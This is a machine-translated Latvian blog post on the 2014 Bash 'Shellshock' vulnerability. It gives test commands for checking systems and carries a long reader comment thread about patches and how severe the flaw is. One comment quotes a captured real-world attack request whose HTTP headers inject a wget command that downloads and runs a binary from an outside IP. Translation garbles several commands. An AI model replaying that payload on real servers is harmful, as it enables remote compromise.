Bash: atklāta (un novērsta) jauna ievainojamība

Dažos emuāros tas darbojas kā ugunsgrēks, kas ir publicēts drošības emuārs de Red Hat par Bashā atklāto ievainojamību globālo mainīgo nepareizas izmantošanas dēļ. Saskaņā ar sākotnējām ziņām:

“... Neaizsargātība ir saistīta ar faktu, ka pirms izsaukšanas uz bash apvalku jūs varat izveidot vides mainīgos ar īpaši izveidotām vērtībām. Šie mainīgie var saturēt kodu, kas tiek izpildīts, tiklīdz tiek izsaukta čaula. Šo izstrādāto mainīgo nosaukums nav svarīgs, tikai to saturs. Rezultātā šī neaizsargātība ir pakļauta daudziem kontekstiemPiemēram:

  • ForceCommand to izmanto sshd konfigurācijās, lai nodrošinātu ierobežotas komandu izpildes iespējas attāliem lietotājiem. Šo trūkumu var izmantot, lai no tā izvairītos un nodrošinātu patvaļīgu komandu izpildi. Dažās Git un Subversion implementācijās tiek izmantoti šādi ierobežoti čaulas. Regulāra OpenSSH lietošana netiek ietekmēta, jo lietotājiem jau ir piekļuve konsolei.
  • Apache serveris, izmantojot mod_cgi vai mod_cgid, tiek ietekmēts, ja CGI skripti tiek rakstīti gan bash, gan spawn apakšlīmeņos. Šādus apakšlīmeņus netieši izmanto sistēma system / popen C, operētājsistēmā os.system / os.popen Python, ja PHP sistēmā tiek izmantots sistēmas / exec apvalks (ja darbojas CGI režīmā) un atveriet / system Perl (kas ir atkarīgs no komandu virknes).
  • PHP skripti, kas izpildīti ar mod_php, netiek ietekmēti, pat ja tiek atskaņoti apakšlīmeņi.
  • DHCP klienti izsauc čaulas skriptus, lai konfigurētu sistēmu ar vērtībām, kas ņemtas no potenciāli ļaunprātīga servera. Tas ļautu patvaļīgas komandas izpildīt, parasti kā root, DHCP klienta mašīnā.
  • Dažādi dēmoni un programmas ar SUID privilēģijām var izpildīt čaulas skriptus ar lietotāja iestatītajām / ietekmētajām vides mainīgo vērtībām, kas ļautu izpildīt patvaļīgas komandas.
  • Jebkura cita programma, kas piesaista čaulu vai palaiž čaulas skriptu, piemēram, izmantojot bash kā tulku. Shell skripti, kas neeksportē mainīgos, nav pakļauti šai problēmai, pat ja tie apstrādā neuzticamu saturu un glabā to čaulas mainīgie (pa kreisi) un apakšlīmeņi ir atvērti.

... "

Kā uzzināt, vai tas ietekmē manu basu?

Ņemot to vērā, ir ļoti vienkāršs veids, kā uzzināt, vai šī neaizsargātība mūs ietekmē. Patiesībā es pārbaudīju savus Antergos un acīmredzot man nav problēmu. Kas mums jādara, ir atvērt termināli un ievietot:

env x = '() {:;}; atbalss neaizsargāts 'bash -c "atbalss tas ir tests"

Ja tas iznāk šādā veidā, mums nav problēmu:

env x = '() {:;}; atbalss neaizsargāts 'bash -c "atbalss tas ir tests" bash: brīdinājums: x: funkcijas definīcijas ignorēšanas mēģinājums bash: kļūda, importējot funkciju x definīciju funkcijai x, tas ir tests

Ja rezultāts atšķiras, izmantojiet mūsu vēlamo izplatīšanas atjaunināšanas kanālus, lai redzētu, vai viņi jau ir lietojuši plāksteri. Tātad jūs zināt 😉

Atjaunināts: šī ir kolēģa izeja, izmantojot Ubuntu 14:04:

env x = '() {:;}; atbalss neaizsargāts 'bash -c "atbalss tas ir tests" neaizsargāts tas ir tests

Kā redzat, līdz šim tas ir neaizsargāts.


Atstājiet savu komentāru

Jūsu e-pasta adrese netiks publicēta. Obligātie lauki ir atzīmēti ar *

*

*

  1. Atbildīgais par datiem: Migels Ángels Gatóns
  2. Datu mērķis: SPAM kontrole, komentāru pārvaldība.
  3. Legitimācija: jūsu piekrišana
  4. Datu paziņošana: Dati netiks paziņoti trešām personām, izņemot juridiskus pienākumus.
  5. Datu glabāšana: datu bāze, ko mitina Occentus Networks (ES)
  6. Tiesības: jebkurā laikā varat ierobežot, atjaunot un dzēst savu informāciju.

  1.   gerson teica

    Man ir Kubuntu 14.04 no 64, un es arī saņemu:

    env x = '() {:;}; atbalss neaizsargāts 'bash -c "atbalss tas ir tests"
    neaizsargāti
    Šis ir tests

    Es jau atjaunināju, bet tas nav pareizs. Ko darīt?

    1.    dzīvīgs teica

      Pagaidiet, līdz tie tiks atjaunināti. Jau eOS, piemēram, atjaunināts .. 😀

    2.    John teica

      Cik dīvaini, man ir arī Kubuntu 14.04

      $ env x = '() {:;}; atbalss neaizsargāts 'bash -c "atbalss tas ir tests"
      bash: brīdinājums: x: funkcijas definēšanas mēģinājuma ignorēšana
      bash: kļūda, importējot funkcijas x definīciju
      Šis ir tests

      1.    John teica

        Es piebildu, ka šodien lejupielādētās paketes "bash" versija ir šāda:
        4.3

        http://packages.ubuntu.com/trusty/bash

    3.    3000 teica

      Manā gadījumā, dodot komandu, tas man vienkārši dod terminālā:

      >

      Jebkurā gadījumā joks ir tāds, ka es atjaunināju Debian Wheezy, un tas mani pameta.

      1.    Jukiteru teica

        Sēkšana joprojām ir neaizsargāta pret kļūdas otro daļu, vismaz pēcpusdienā (UTC -4: 30) problēma joprojām bija šāda: /

  2.   Pēterčehs teica

    Es tikko pārliecinājos, ka pēc atjauninājuma piemērošanas šorīt ne Slackware, ne Debian, ne Centos netiek ietekmēti, jo viņi saņēma atbilstošu atjauninājumu.

    Kas padara Ubuntu joprojām neaizsargātu šajā stundā? Un saki, ka tas ir droši: D.

    1.    John teica

      Bet vai esat mēģinājis atjaunināt Ubuntu?
      Ar šodienas atjauninājumu viņi to arī ir izlabojuši.

      1.    Pēterčehs teica

        OK

    2.    robots teica

      Drošības eksperti brīdina par “Bash” neaizsargātību, jo tas var radīt lielākus draudus Linux programmatūras lietotājiem nekā Heartbleed trūkums, kur “hakeri” var izmantot Bash kļūdu, lai pilnībā kontrolētu sistēmu.
      Kiberdrošības firmas Rapid7 inženieru menedžeris Tods Bārdslijs brīdināja, ka kļūda tika novērtēta ar 10 smaguma pakāpi, kas nozīmē, ka tai ir vislielākā ietekme, un novērtēta kā "zema" par izmantošanas sarežģītību, kas nozīmē "hakeriem" salīdzinoši viegli uzbrukumiem. Izmantojot šo ievainojamību, uzbrucēji var potenciāli pārņemt kontroli pār operētājsistēmu, piekļūt konfidenciālai informācijai, veikt izmaiņas utt., ”Sacīja Bērdslijs. "Ikvienam, kam ir sistēmas, kas aizņem Bašu, nekavējoties jāpielieto plāksteris," viņš piebilda.
      PIRMS ŠĪS NESPĒJAMĪBAS, KAS RĀDA VECO INSTRUMENTU (GNU), kurā mitināts Bahs, Linux programmatūrai būtu ērtāk atbrīvoties no GNU un nomainīt BSD rīku.

      PS: necenzēt manu vārda brīvību, ... neapvainot nevienu, ... neizdzēst manu ziņojumu tāpat kā iepriekšējo ziņojumu, kuru esmu izdzēsis!

      1.    Xerix teica

        Ak, lūdzu, nepārlieciet to. Kā es ienīstu tos cilvēkus, kuri izmanto BSD un nicina GNU, Linux vai jebko citu no šiem projektiem.

      2.    Pēterčehs teica

        Es esmu ar jums, un jums ir pilnīga taisnība attiecībā uz šīs bedres nopietnību.

      3.    diazepans teica

        Tā nebija cenzūra, tā bija atlaišana (jūs to pašu komentējāt gnome 3.14 ierakstā)

      4.    Personāls teica

        «… Un novērtēts ar zemu izmantošanas sarežģītību, kas nozīmē, ka hakeru uzbrukumiem tas ir samērā VIEGLI»

        Vai neatbilstība ir pamanāma?
        Kā var viegli izmantot ievainojamību un tajā pašā laikā tam ir "zems" riska līmenis, jo to ir tik sarežģīti izmantot?
        Tā ir kļūda, kas tika novērsta dažu stundu laikā pēc tikšanās un par kuru, tāpat kā nožēlojami, nav ziņu par to, ka tā būtu izmantota (protams, šim ir mazāk laika, lai iepazītos).
        Tā ir vairāk bulvārprese nekā reāls risks.

      5.    Pēterčehs teica

        Vai @Staff jums šķiet mazsvarīgs? Ko tu man tagad pateiksi?

        GET./.HTTP/1.0
        .Lietotājs-aģents: .Paldies-Rob
        .Cepums: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        . Saimnieks: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        .Referents: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        .Pieņemiet:. * / *

        $ fails nginx
        nginx: izpildāms ELF 32 bitu LSB, Intel 80386, versija 1 (SYSV), statiski saistīta, GNU / Linux 2.6.18, noņemta

        $md5sum nginx
        5924bcc045bb7039f55c6ce29234e29a nginx

        $sha256sum nginx
        73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx

        Vai jūs zināt, kas tas ir? No maz bīstama nekas ...

      6.    Jukiteru teica

        Situācija ir diezgan nopietna, bet no turienes sakot, ka BSD opcijai jāpārtrauc lietot bash, tas jau ir tikpat daudz, vienalga, atjauninājums jau ir, es vienkārši pieskaros atjauninājumam un nekas cits.

        Tagad PD, es domāju, ka tas drīzāk ir kolēģis @robet, es nedomāju, ka šeit administratori velta sevi šādu komentāru dzēšanai, jo jā, jo kopš tā laika, kad es piedalījos šajā kopienā, man bija tāda sajūta, un es ceru, ka tā paliek tāds.

        Sveicieni.

      7.    dzīvīgs teica

        Jūs pievienojāt tieši to pašu komentāru diviem dažādiem ierakstiem. Ja jūs mēģināt reklamēt stāsta "avotu", atvainojiet, šī nav īstā vieta.

      8.    mario teica

        Bash nāk no Unix (un tā GNU klona). Tiek ietekmētas arī tādas BSD bāzes sistēmas kā OSX, un, pēc Genbeta teiktā, viņi to vēl nav aizlāpījuši. Tāpat, lai piekļūtu Bash, jums ir nepieciešams vietējais vai SSH lietotāja konts.

      9.    Jukiteru teica

        @Personāls:

        1.- Pakalpojumu apjoma dēļ, ko var ietekmēt kļūda, tas tiek klasificēts kā 10. līmenis (maksimālais bīstamības līmenis). Galvenajā piezīmē viņi šo faktu padara ļoti skaidru, apgalvojot, ka kļūda var ietekmēt tādus pakalpojumus kā apache, sshd, programmas ar suid atļaujām (cita starpā xorg).

        2. - Runājot par tā ieviešanu, tas tiek klasificēts kā zemas grūtības pakāpe, un labākais piemērs tam ir ievainojamības testa skripts, kuru @elav ir ievietojis ziņojumā. Ļoti grūti īstenot nav, kā redzat.

        Informācijā es neredzu lieku darbību (es redzu tikai Google tulkojumu), un, ja problēma ir diezgan nopietna, un, kā jūs sakāt, tai jau ir plāksteris un risinājums, bet ne tam, tas vairs nav risks, un diezgan reāls.

      10.    Personāls teica

        @petercheco / @Yukiteru

        Nepārprotiet mani, es domāju, ka ir skaidrs, ka mana kritika ir ziņa, kuru Robets saista un ir vērsta uz neatbilstību, nevis atlaišanu.

        Tādā pašā veidā mums ir jānošķir risks un briesmas (pēdējos es neminēju), mēs tos parasti lietojam kā sinonīmus, taču šeit briesmas būtu kļūdas bojājuma spēja un risks ar tā rašanās varbūtību.
        Konkrētajā gadījumā es ienācu no vakardienas. Tas nebija paredzēts adresātu sarakstiem vai tamlīdzīgi. Tas bija paredzēts darbvirsmas izplatītājam! Es paņēmu telefonu un nosūtīju ziņojumu sysadmin ar saiti, un es apstiprināju, ka man viss ir aizlāpīts, tad atvainojiet, bet šīs ziņas mani nemodina.

      11.    robots teica

        Citos forumos viņi min par Bash ievainojamību, "risinājumu, kuru izlaida Debian un Ubuntu", taču šodien viņi atklāja, ka ievainojamība joprojām pastāv, tāpēc risinājums bija nepilnīgs, viņi to piemin!

        Es redzu, ka daudzi mani ir kritizējuši par vienkāršu faktu, ka cilvēki tiek novērsti no ievainojamības smaguma pakāpes, kas ir kvalificēti ar maksimālās bīstamības līmeni 10, un pieminēja iespējamos Linux programmatūras risinājumus pirms novecojuša GNU rīka, kurā tiek mitināts Bash - ko lieliski GNU jāmaina ar BSD rīku Linux programmatūrā,… es arī izmantoju Linux un man patīk Linux!

        Es paskaidroju, ka Bash pēc noklusējuma nav instalēts BSD, tā ir vēl viena Linux saderības pakete, kuru var instalēt BSD ... jā! Avots ir ievietots tā, lai viņi varētu pārbaudīt ziņas, jo daudzi lietotāji dažreiz netic ziņojumam vai komentāriem.

        1.    dzīvīgs teica

          robets: Kā viņi jums jau teica atkal un atkal, jūs jau ievietojāt savu komentāru ar ziņām ierakstā, jums tas nav jāieliek katrā komentējamā ziņojumā.

          Par bash, jo ir arī citi apvalki, kurus var izmantot gadījumā, ja Bash ir neaizsargāts. 😉

      12.    mario teica

        Robet, cik man zināms, nav programmatūras, kas apvienotu Linux kodolu ar BSD userland. Tuvākais ir otrādi, kBSD + GNU, kā to dara Gentoo un Debian. Turklāt GNU (1983) nevarētu saukt par "vecmodīgu", ja tas ir pēc BSD (1977). Viņi abi koplieto savu unix sakni (bet ne kodu), "Linux savietojamības" nebūtu, ja Bash tiktu izveidots, kad Linuss T vēl bija bērns.

  3.   manuelperez teica

    ui, debian testēšana šajā laikā ir "neaizsargāta", kāda mums ir svītra ...

    1.    mrcelhw teica

      Es izmantoju Debian testēšanu, un pat šajā nozarē mēs esam saņēmuši bash atjauninājumu

  4.   diazepans teica

    saskaņā ar genbeta ir arī vēl viena ievainojamība
    http://seclists.org/oss-sec/2014/q3/685

    komanda konsultēties ir
    env X = '() {(a) => \' sh -c "atbalss neaizsargāts"; bash -c "atbalss 2 neizdodas"

    1.    dzīvīgs teica
      env X = '() {(a) => \' sh -c "atbalss neaizsargāts"; bash -c "atbalss Neatkārtota kļūme 2" sh: X: 1. rinda: sintaktiska kļūda netālu no negaidīta elementa = = sh: X: 1. rinda: "" sh: kļūda, importējot funkcijas "X" definīciju sh: ievainojams: komanda nav atrasta 2. neveiksme bez lāpīšanas
      
      1.    diazepans teica

        tas pats es.

      2.    Giskards teica

        Te tāpat. Bet sākotnējā ziņojuma kļūda tika ielāpīta (L) Ubuntu 14.04

      3.    x11tete11x teica

        Tā vietā, lai veiktu vienkāršu atbalsi, mēģiniet likt izpildīt instrukciju, kurai nepieciešamas privilēģijas, es izmetu "nepietiekamas privilēģijas" ... šī kļūda nepaaugstina privilēģijas? Ja tas nepaaugstina privilēģijas, tas nav tik bīstami, kā viņi to krāso .

      4.    Xurxo teica

        Tev taisnība!! tās bija divas ievainojamības ...

        Man Linux Mint 17 pēc otrā bash atjauninājuma, ko viņi vakar vakarā ievietoja Ubuntu krātuvēs, izpildot šo komandu, čaula piedāvā šo izvadi:

        env X = '() {(a) => \' sh -c "atbalss neaizsargāts"; bash -c "echo Fail 2 unpatched"
        >

        "Bassh" versija, kas tika ievietota Ubuntu krātuvēs, lai atjauninātu iepriekšējās, ir:

        4.3

        Debian atvasinātajās sistēmās varat pārbaudīt instalēto versiju ar šo komandu:

        dpkg -s bash | grep versija

        Jebkurā gadījumā tas būtu jāprecizē, vismaz attiecībā uz Debian, Ubuntu un Mint lietotājiem; Jums nevajadzētu pārāk uztraukties par programmām, kas palaiž skriptus ar galveni #! / Bin / sh, jo šajos izplatījumos / bin / sh neizsauc "bash", bet saistās ar čaulu "domuzīme" (domuzīme ir :)

        Debian Alchemist Console (domuzīme) ir atvasināta POSIX konsole
        pelnu.
        .
        Tā kā skripti tiek izpildīti ātrāk nekā bash, un tam ir mazāk atkarību
        bibliotēkas (padarot to izturīgāku pret programmatūras kļūmēm vai
        aparatūra), to izmanto kā noklusējuma sistēmas konsoli sistēmās
        Debian.

        Tātad, vismaz Ubuntu, "bash" tiek izmantots kā čaula lietotāja pieteikšanās brīdim (arī root lietotājam). Bet jebkurš lietotājs pēc noklusējuma lietotājam un sakņu konsolēm (termināliem) var izmantot citu apvalku.

        Ir viegli pārbaudīt, vai čaula izpilda skriptus (#! / Bin / sh), izpildot šīs komandas:

        file / bin / sh
        (izeja ir / bin / sh: simboliska saite uz “domuzīmi”), mēs sekojam pēdai, atkārtojot komandu

        fails / miskaste / domuzīme
        (izeja ir / bin / domuzīme: ELF 64 bitu koplietojams objekts LSB, x86-64, 1. versija (SYSV), tāpēc tas ir izpildāmais fails.

        Šie ir Linux Mint 17. izplatīšanas rezultāti. Citos sadalījumos, kas nav Ubuntu / Debian bāzes, tie var būt atšķirīgi.

        Nav grūti nomainīt noklusējuma apvalku !! jūs pat varat izmantot citu lietotājiem un root lietotājiem. Patiesībā jums vienkārši jāinstalē izvēlētais čaula un jāmaina noklusējums ar komandu "chsh" vai rediģējot failu / etc / passwd (lai gan lietotāji, kuri nezina kļūdas sekas, rediģējot failu "passwd", Labāk, ja viņi ļoti labi informē sevi un pirms tā rediģēšanas izveido oriģināla kopiju, ja nepieciešams to atgūt).

        Es jūtos ērtāk ar "tcsh" (tcsh ir :)

        TENEX C konsole, uzlabota Berkeley csh versija

        "Csh" ir tas, ko pirms dažiem gadiem izmantoja Mac OS X. Kas ir jēga, ņemot vērā, ka liela daļa Apple operētājsistēmas ir FreeBSD kods. Tagad no tā, ko es lasīju vakar, šķiet, ka tie arī nodrošina "bash" lietotāju termināliem.

        SECINĀJUMI:

        - Labotās "bash" versijas jau ir izplatītas "visbiežāk izmantotajiem izplatījumiem"
        - "bash" versijā 4.3-7ubuntu1.2 un jaunākās versijās šīs kļūdas nav
        - OS * Linux nav obligāti jāizmanto "bash"
        - Daži * Linux izplatīšanas saites #! / Bin / sh ar "bash"
        - Ir alternatīvas: pelni, domuzīme, csh, tcsh un daži citi
        - Nav grūti nomainīt noklusējuma čaulu, kuru sistēma izsauc, atverot termināli
        - Mazās mazās ierīcēs (maršrutētājos un citās) tiek izmantots "bash", jo tas ir ļoti liels !!

      5.    Xurxo teica

        Pašlaik ir tikko ieradies vēl viens atjauninājums, kas instalē citu "bash" 4.3-7ubuntu1.3 versiju

        Operētājsistēmai Linux Mint 17 un Ubuntu 14.04.1 LTS

        1.    dzīvīgs teica

          ArchLinux ievadīja versiju bash-4.3.026-1

    2.    robots teica

      @ Xurxo… .csh no Berkeley?, ... Jūs kaut ko saprotat no tā, ko es runāju iepriekš, un labāk ir izmantot BSD “csh” ... nevis veco GNU rīku, kurā tiek mitināts Bash. Šis rīks ir labākais Linux programmatūrai.

  5.   bez nosaukuma teica

    Es domāju, ka šī ir kļūda

    https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760

    taisnība?

  6.   Gonzalo teica

    Un kāds būtu risinājums?

    1.    dzīvīgs teica

      Pagaidiet, līdz viņi atjaunina paketi jūsu izplatītājā 😉

  7.   diazepans teica

    Kļūda tika kristīta kā gliemežvāks
    http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/

  8.   Pablo Ivans Korrea teica

    neaizsargāti
    Šis ir tests

    Pagaidām nav plākstera Ubuntu Studio 14.04

    1.    Wisp teica

      Salabots Ubuntu Studio 14.04.1
      wisp @ ubuntustudio: ~ $ env x = '() {:;}; atbalss neaizsargāts 'bash -c "atbalss tas ir tests"
      bash: brīdinājums: x: funkcijas definēšanas mēģinājuma ignorēšana
      bash: kļūda, importējot funkcijas x definīciju
      Šis ir tests

  9.   ceļinieks teica

    Patiesībā tā ir neliela ievainojamība, ja tā ietekmē jūs, tas ir, ka jūs pirms tam darījāt kaut ko nepareizi ...

    Tā kā bash skriptu, kas darbojas ar root tiesībām, nekad nedrīkst pakļaut lietotājam. Un, ja viņš skrien bez privilēģijām, šādas uzpūtības nav. Patiesībā tas ir dumjš. Daudz biedējošu.

    1.    Xerix teica

      ES domāju tāpat.

    2.    Personāls teica

      Precīzi, lai pārdotu vairāk laikrakstu vai iegūtu vairāk apmeklējumu, šīs kļūdas ir labas.
      Bet viņi vienmēr aizmirst pieminēt, ka, lai kompromitētu datoru ar šāda veida skriptiem, vispirms jums ir jābūt piekļuvei bash un pēc tam tam jābūt root.

      1.    Darjo teica

        personāls, ja izmantojat apache ar cgi, vienkārši ievietojiet http galvenes kā sīkfailus vai norādiet funkciju, kuru vēlaties izpildīt. To pat izmantoja tārpu izplatīšanai.

    3.    Darjo teica

      un, ja kāds ieliek čaumalu serverim ar wget mishell.php, tādā gadījumā tas nav nopietni, vai ne?

    4.    3000 teica

      Jums piekrītu. Es domāju, ka tā bija milzīga kļūda, piemēram, Heartbleed (pat NSA aizdeva sevi, lai veicinātu saslimstību), bet galu galā tā bija neliela kļūda.

      Ir arī citas patiešām nopietnas kļūdas, piemēram, trakais Flash patēriņš un veiktspējas kritums Pepper Flash Player, kā arī tas, kas jau ir novērsts WebRTC kļūda pārlūkos Chrome un Firefox.

  10.   Bindermans teica

    Vai jūs zināt, vai tas ir paredzēts cilvēkiem, kuriem ir Linux Mint 16?

  11.   oscar teica

    Debian testēšanā tas jau bija izlabots.

  12.   yoyo teica

    Manos 5 rajonos tas ir atrisināts, manā OS X es nezinu.

    Lūdzu, necenzējiet manu komentāru, es teicu OS X. Es nezinu, vai jūs varat teikt OS X šajā vietnē.

    1.    tanhauzers teica

      @ yoyo nu nepārlieciet to pārāk daudz, ka viņi joprojām strādā pie dažām plākstera detaļām ... izmēģiniet to un pēc tam pastāstiet man, kā XD

      env x = '() {:;}; atbalss neaizsargāts 'bash -c "atbalss esmu neaizsargātāks nekā iphone 6 trash"

      Ja viņi to ir atrisinājuši 100% pirms OS X, es derēju uz kaut ko

    2.    3000 teica

      Nu, pat Ars Technica tie piešķir Bash nozīmi OSX.

    3.    dzīvīgs teica

      @Yoyo nākamais komentārs par OS X par SPAM .. lla tu save .. 😛

  13.   tanhauzers teica

    @yoyo tur, lai labotu pēdiņas ... bet pārējo tu zini 😉

    1.    3000 teica

      Tāpat kā viņi ir kļuvuši patronizējoši ar OSX (jo OSX joprojām izmanto Bash: v).

      Jebkurā gadījumā man nav tik daudz jājaucas ar Debian Jessie.

  14.   elhui2 teica

    Ja sistēma OS OS ir neaizsargāta:
    yum tīri visu && yum update bash

    lai redzētu bash versiju:
    apgriezieni -qa | grep bash

    Ja versija ir vecāka par bash-4.1.2-15.el6_5.1, jūsu sistēma var būt neaizsargāta!

    Sveicieni.

  15.   manuelperez teica

    2. ievainojamība vēl nav novērsta

    env amvariable2 = '() {(a) => \' sh -c "echo amVulnerable"; bash -c "atbalss 2 neizdodas"

  16.   Jēzus Peraless teica

    Notiek atjaunināšana ...

  17.   pārslēdzējs teica

    Man Gentoo notiek tieši pretēji, es esmu neaizsargāts tikai pret pirmo neveiksmi, bet ar otro es to saņemu:
    [kods] sh: X: 1. rinda: sintaktiska kļūda pie negaidīta elementa `= '
    sh: X: 1. rindiņa: "
    sh: kļūda, importējot funkcijas X definīciju
    sh: neaizsargāts: komanda nav atrasta
    2. kļūda nav aizlāpīta
    [/ kods]
    Es nezinu, vai jau būs stabila Bash versija ar labotām kļūdām, bet katrā ziņā tas būs gaidāms nākamajai reizei, kad es veicu emerge –sync && emerge –update –deep –with-bdeps = un - newuse @world (tā es atjauninu visu sistēmu).

    1.    Jukiteru teica

      Man ir Gentoo ar versiju 4.2_p50, un līdz šim tas ir izturējis visus testus. Mēģiniet parādīties –sync un pēc tam parādieties -av1 app-shells / bash un pēc tam pārbaudiet, vai jums ir versija 4.2_p50, izmantojot komandu bash –version.

  18.   Fer teica

    Vai esat to izmēģinājis?

    Un ar jaunām paketēm, jaunu testu, ko Red Hat mums nodrošina

    cd / tmp; rm -f / tmp / atbalss; env 'x = () {(a) => \' bash -c "atbalss datums"; kaķis / tmp / atbalss

    Ja mūsu sistēma nav neaizsargāta un ir pareizi ielāpīta, tai ir jāsniedz mums kaut kas līdzīgs šim
    1 datums
    2 cat: / tmp / echo: fails vai direktorijs nepastāv

  19.   Jukiteru teica

    Izmēģiniet šādi:

    env X = '() {(a) => \' sh -c "atbalss neaizsargāts"; bash -c "ielāpīta atbalss kļūme 2"

    Man sanāk

    neaizsargāti
    Kļūda 2 salāpīts.

    1.    Jukiteru teica

      Aizmirsti, līnija ir slikti formatēta.

  20.   Oskars Meža teica

    Lieliski! Es jau veicu atjauninājumu savā Slackware, paldies!

  21.   Lotbroka teica

    Sveiki, rodas jautājums, man ir vairāki serveri ar 10 bitu "SUSE Linux Enterprise Server 64".
    Izpildot komandas, kuras esmu neaizsargāts, esmu pat neaizsargātāka nekā iPhone 6 xD miskaste
    Ja es kļūdos, atjauninot / instalējot pakotnes SUSE, tas tiek darīts ar komandu «zypper».

    Dažos serveros tas man saka:

    BIAL: ~ # rāvējslēdzējs uz augšu
    -bash: zypper: komanda nav atrasta
    BIAL: ~ #

    Un citās tas:

    MVU: ~ # aizdare
    Tiek atjaunoti sistēmas avoti ...
    Parsē SUSE Linux Enterprise Server 10 SP2-20100319-161944 metadatus ...
    Parsē RPM datu bāzi ...
    Kopsavilkums:
    Nav ko darīt.

    Ko es daru?
    Es zinu, ka daži saka, ka ievainojamība ir mazāka par to, ko viņi to krāso, bet man tā ir, un es nevēlos pakļaut riskam, vai tas būtu mazs vai liels.

    Sveicieni.

  22.   Sanders gutierrez teica

    Labvakar, esmu mēģinājis ielīmēt kodu, kuru jūs norādījāt rakstā, es to saprotu
    slīpmašīnas @ pc-slīpmašīnas: ~ $ env x = '() {:;}; atbalss neaizsargāts 'bash -c "atbalss tas ir tests"
    Šis ir tests
    slīpmašīnas @ pc-slīpmašīnas: ~ $
    Vai jūs, lūdzu, paskaidrotu man, kā plāksteri izlabot, es atjauninu katru dienu, un tūlītējā izvadā es neredzu nekādas izmaiņas.

    Liels paldies!